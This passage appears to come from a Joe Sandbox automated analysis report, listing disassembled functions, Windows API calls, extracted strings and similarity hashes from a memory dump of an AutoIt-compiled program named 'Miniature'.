                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: 0
                                                  • API String ID: 2326795674-4108050209
                                                  • Opcode ID: 02cfa5869dc5856e95c3c45bb9ceaac29de913be6faeb466164eb3463a3dbbe9
                                                  • Instruction ID: c972d80f100c9f96755f5cc2c9921f5c99428e143c6d08a12c9f7e85bf3e2cdc
                                                  • Opcode Fuzzy Hash: 02cfa5869dc5856e95c3c45bb9ceaac29de913be6faeb466164eb3463a3dbbe9
                                                  • Instruction Fuzzy Hash: FF02DE3020A381EFE765CF18C848BAABBE4FF89314F048559FAD997299C739D944CB51
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 0101AF51
                                                  • SetTextColor.GDI32(?,?), ref: 0101AF55
                                                  • GetSysColorBrush.USER32(0000000F), ref: 0101AF6B
                                                  • GetSysColor.USER32(0000000F), ref: 0101AF76
                                                  • CreateSolidBrush.GDI32(?), ref: 0101AF7B
                                                  • GetSysColor.USER32(00000011), ref: 0101AF93
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0101AFA1
                                                  • SelectObject.GDI32(?,00000000), ref: 0101AFB2
                                                  • SetBkColor.GDI32(?,00000000), ref: 0101AFBB
                                                  • SelectObject.GDI32(?,?), ref: 0101AFC8
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0101AFE7
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0101AFFE
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0101B013
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0101B05F
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0101B086
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0101B0A4
                                                  • DrawFocusRect.USER32(?,?), ref: 0101B0AF
                                                  • GetSysColor.USER32(00000011), ref: 0101B0BD
                                                  • SetTextColor.GDI32(?,00000000), ref: 0101B0C5
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0101B0D9
                                                  • SelectObject.GDI32(?,0101AC1F), ref: 0101B0F0
                                                  • DeleteObject.GDI32(?), ref: 0101B0FB
                                                  • SelectObject.GDI32(?,?), ref: 0101B101
                                                  • DeleteObject.GDI32(?), ref: 0101B106
                                                  • SetTextColor.GDI32(?,?), ref: 0101B10C
                                                  • SetBkColor.GDI32(?,?), ref: 0101B116
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: 3ba9a69a543306f1f19bb20774dcfe7eb63b2095f0fea2867795cf206e312b6e
                                                  • Instruction ID: a2fc24f5071e04c9ecf799d6a376ce1ced2f7126c937f40c05ebe90f55c80618
                                                  • Opcode Fuzzy Hash: 3ba9a69a543306f1f19bb20774dcfe7eb63b2095f0fea2867795cf206e312b6e
                                                  • Instruction Fuzzy Hash: 95615E71901218EFDF219FA8DC48EAE7BB9FF08320F204155F955AB299D77A9940CF90
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 010190EA
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010190FB
                                                  • CharNextW.USER32(0000014E), ref: 0101912A
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0101916B
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01019181
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01019192
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 010191AF
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 010191FB
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01019211
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 01019242
                                                  • _memset.LIBCMT ref: 01019267
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 010192B0
                                                  • _memset.LIBCMT ref: 0101930F
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01019339
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 01019391
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 0101943E
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 01019460
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010194AA
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010194D7
                                                  • DrawMenuBar.USER32(?), ref: 010194E6
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 0101950E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: 9cdf8ffe58b4d5fd48b66145d07fb9b9b1ad7559f87e7f52fe8f8d12b5dfb43c
                                                  • Instruction ID: ee53a68eeb2c439a41f5d05551c120574220fd253bc4b66b0a4ba47556095bf8
                                                  • Opcode Fuzzy Hash: 9cdf8ffe58b4d5fd48b66145d07fb9b9b1ad7559f87e7f52fe8f8d12b5dfb43c
                                                  • Instruction Fuzzy Hash: CAE1E470900208AFDF619F95CC98EEE7BB8FF09714F108195FA95AB188D7798A81CF51
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 01015007
                                                  • GetDesktopWindow.USER32 ref: 0101501C
                                                  • GetWindowRect.USER32(00000000), ref: 01015023
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 01015085
                                                  • DestroyWindow.USER32(?), ref: 010150B1
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 010150DA
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 010150F8
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0101511E
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 01015133
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01015146
                                                  • IsWindowVisible.USER32(?), ref: 01015166
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01015181
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01015195
                                                  • GetWindowRect.USER32(?,?), ref: 010151AD
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 010151D3
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 010151ED
                                                  • CopyRect.USER32(?,?), ref: 01015204
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 0101526F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 436088b17cbbff83b37e6a80e377341ffc651cf4ac8e8c5cc746a8504a1ed477
                                                  • Instruction ID: 501e2e424086abe3a7fd1414726b21171800c1cce1eed845193fe85617058019
                                                  • Opcode Fuzzy Hash: 436088b17cbbff83b37e6a80e377341ffc651cf4ac8e8c5cc746a8504a1ed477
                                                  • Instruction Fuzzy Hash: F2B19C71604300AFEB55DF64CC88B6ABBE4BF89710F008A1CF5D99B295D779E805CB91
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FF499C
                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FF49C2
                                                  • _wcscpy.LIBCMT ref: 00FF49F0
                                                  • _wcscmp.LIBCMT ref: 00FF49FB
                                                  • _wcscat.LIBCMT ref: 00FF4A11
                                                  • _wcsstr.LIBCMT ref: 00FF4A1C
                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FF4A38
                                                  • _wcscat.LIBCMT ref: 00FF4A81
                                                  • _wcscat.LIBCMT ref: 00FF4A88
                                                  • _wcsncpy.LIBCMT ref: 00FF4AB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                  • API String ID: 699586101-1459072770
                                                  • Opcode ID: 128c0144232bcb6fce8b4b5430be1fd08c774ee2c12dc3f836f5540f6e0bbb25
                                                  • Instruction ID: 12adc99b82ff1874a3e5344b0fa20ff9e2e15ffd0e568137b06b14c301a92eb2
                                                  • Opcode Fuzzy Hash: 128c0144232bcb6fce8b4b5430be1fd08c774ee2c12dc3f836f5540f6e0bbb25
                                                  • Instruction Fuzzy Hash: 7B410772A402187BD710BB768D47EFF776CEF45720F100059FA04A6153EB38EA01BAA5
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F92C8C
                                                  • GetSystemMetrics.USER32(00000007), ref: 00F92C94
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F92CBF
                                                  • GetSystemMetrics.USER32(00000008), ref: 00F92CC7
                                                  • GetSystemMetrics.USER32(00000004), ref: 00F92CEC
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F92D09
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F92D19
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F92D4C
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F92D60
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00F92D7E
                                                  • GetStockObject.GDI32(00000011), ref: 00F92D9A
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F92DA5
                                                    • Part of subcall function 00F92714: GetCursorPos.USER32(?), ref: 00F92727
                                                    • Part of subcall function 00F92714: ScreenToClient.USER32(010577B0,?), ref: 00F92744
                                                    • Part of subcall function 00F92714: GetAsyncKeyState.USER32(00000001), ref: 00F92769
                                                    • Part of subcall function 00F92714: GetAsyncKeyState.USER32(00000002), ref: 00F92777
                                                  • SetTimer.USER32(00000000,00000000,00000028,00F913C7), ref: 00F92DCC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 7c48b27b7d59491b6516877dcf33cdbe5aa3e4ac723b5da868b5c8d012577be8
                                                  • Instruction ID: 08727224cdcdcd37b442843255b4756cd66783d4ba74814ee1dafa212c3b5203
                                                  • Opcode Fuzzy Hash: 7c48b27b7d59491b6516877dcf33cdbe5aa3e4ac723b5da868b5c8d012577be8
                                                  • Instruction Fuzzy Hash: 07B17071A0030AAFEF64DFA8DD45FAE7BB4FB48320F104119FA55A7284DB799841EB50
                                                  APIs
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                  • GetForegroundWindow.USER32(01020980,?,?,?,?,?), ref: 00FB04E3
                                                  • IsWindow.USER32(?), ref: 00FE66BB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$Foreground_memmove
                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                  • API String ID: 3828923867-1919597938
                                                  • Opcode ID: 4c6f85e7d6f8852f50be36cf656d1f4d410838026b587e482496c01d973d3a76
                                                  • Instruction ID: b03d4920a39ef56a4c5a94a9e4709e2c505b56ceca007c8caa1713dbc889d84a
                                                  • Opcode Fuzzy Hash: 4c6f85e7d6f8852f50be36cf656d1f4d410838026b587e482496c01d973d3a76
                                                  • Instruction Fuzzy Hash: F9D13770504346DFCB14EF22C880A9ABBB1BF65394F204A19F496871A1DF34F959EF91
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 010144AC
                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0101456C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                  • API String ID: 3974292440-719923060
                                                  • Opcode ID: 37d5cfaa4366cc6f87ba640559d6c4ac2137d93f3dac00144f00a74fde11114e
                                                  • Instruction ID: 51340ffed9969d65667a397265183747f02f8c009bf7f1c0c2afa1bafc6cb248
                                                  • Opcode Fuzzy Hash: 37d5cfaa4366cc6f87ba640559d6c4ac2137d93f3dac00144f00a74fde11114e
                                                  • Instruction Fuzzy Hash: BDA18E702143019FDB14EF24CD51A6AB7A5BF89314F108968F9D69B2E6DF38EC06CB91
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 010056E1
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 010056EC
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 010056F7
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 01005702
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0100570D
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 01005718
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 01005723
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 0100572E
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 01005739
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 01005744
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 0100574F
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 0100575A
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 01005765
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 01005770
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0100577B
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 01005786
                                                  • GetCursorInfo.USER32(?), ref: 01005796
                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 010057C1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                  • String ID:
                                                  • API String ID: 3215588206-0
                                                  • Opcode ID: c6c303cb6d91a311a925c2eb798708a007cdfa72f7712478c3380667c0614e37
                                                  • Instruction ID: 7223530c7fc64263de99aff7fb90b9817a0b3ba3d61e3083d6a362bfe87e6ba5
                                                  • Opcode Fuzzy Hash: c6c303cb6d91a311a925c2eb798708a007cdfa72f7712478c3380667c0614e37
                                                  • Instruction Fuzzy Hash: AF414470E043196ADB509FBA8C49D6EFEF8EF51B10F10452BE549E7290DAB865018F91
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00FEB17B
                                                  • __swprintf.LIBCMT ref: 00FEB21C
                                                  • _wcscmp.LIBCMT ref: 00FEB22F
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FEB284
                                                  • _wcscmp.LIBCMT ref: 00FEB2C0
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00FEB2F7
                                                  • GetDlgCtrlID.USER32(?), ref: 00FEB349
                                                  • GetWindowRect.USER32(?,?), ref: 00FEB37F
                                                  • GetParent.USER32(?), ref: 00FEB39D
                                                  • ScreenToClient.USER32(00000000), ref: 00FEB3A4
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00FEB41E
                                                  • _wcscmp.LIBCMT ref: 00FEB432
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00FEB458
                                                  • _wcscmp.LIBCMT ref: 00FEB46C
                                                    • Part of subcall function 00FB385C: _iswctype.LIBCMT ref: 00FB3864
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                  • String ID: %s%u
                                                  • API String ID: 3744389584-679674701
                                                  • Opcode ID: b0b3526227745fd3741ce39e84861cfa3c9ca1ad097677a3bac22e173dc55780
                                                  • Instruction ID: 74374998336b6153042779f8b674a78293f6d5f4274a2552f62f159685d3e0df
                                                  • Opcode Fuzzy Hash: b0b3526227745fd3741ce39e84861cfa3c9ca1ad097677a3bac22e173dc55780
                                                  • Instruction Fuzzy Hash: EFA1F071604346EFD724DF22C884BEBB7A8FF44324F204629F999C2191EB34E905DB91
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00FEBAB1
                                                  • _wcscmp.LIBCMT ref: 00FEBAC2
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FEBAEA
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00FEBB07
                                                  • _wcscmp.LIBCMT ref: 00FEBB25
                                                  • _wcsstr.LIBCMT ref: 00FEBB36
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00FEBB6E
                                                  • _wcscmp.LIBCMT ref: 00FEBB7E
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FEBBA5
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00FEBBEE
                                                  • _wcscmp.LIBCMT ref: 00FEBBFE
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00FEBC26
                                                  • GetWindowRect.USER32(00000004,?), ref: 00FEBC8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: 2842d8117e8a9af8e6c82f7d573fa30818d8f0c19b1ee275a613cf33192d9e6d
                                                  • Instruction ID: 47f0a572625a92e1b8e57db98e900a2439abe3c0ab2741368599e8ada1aa1f11
                                                  • Opcode Fuzzy Hash: 2842d8117e8a9af8e6c82f7d573fa30818d8f0c19b1ee275a613cf33192d9e6d
                                                  • Instruction Fuzzy Hash: 9381E4714083869BDB10DF16C885FAB77E8FF84324F248469FD898A096DB38DD45DB61
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: bab7f44da3bd161d992d58e81a21c1a6c843ea901d4a35f8deda32e9f90238dd
                                                  • Instruction ID: 21a3ca3e1efec2991acb09a79a2ef5199e5eabc218a147ee5ccbf39dfff29644
                                                  • Opcode Fuzzy Hash: bab7f44da3bd161d992d58e81a21c1a6c843ea901d4a35f8deda32e9f90238dd
                                                  • Instruction Fuzzy Hash: 4F31C4B1A84205E7DB14FB52CD83EEE73B4AF257A0F200129F592B6092EF5D6E04E951
                                                  APIs
                                                  • LoadIconW.USER32(00000063), ref: 00FECBAA
                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FECBBC
                                                  • SetWindowTextW.USER32(?,?), ref: 00FECBD3
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00FECBE8
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00FECBEE
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00FECBFE
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00FECC04
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FECC25
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FECC3F
                                                  • GetWindowRect.USER32(?,?), ref: 00FECC48
                                                  • SetWindowTextW.USER32(?,?), ref: 00FECCB3
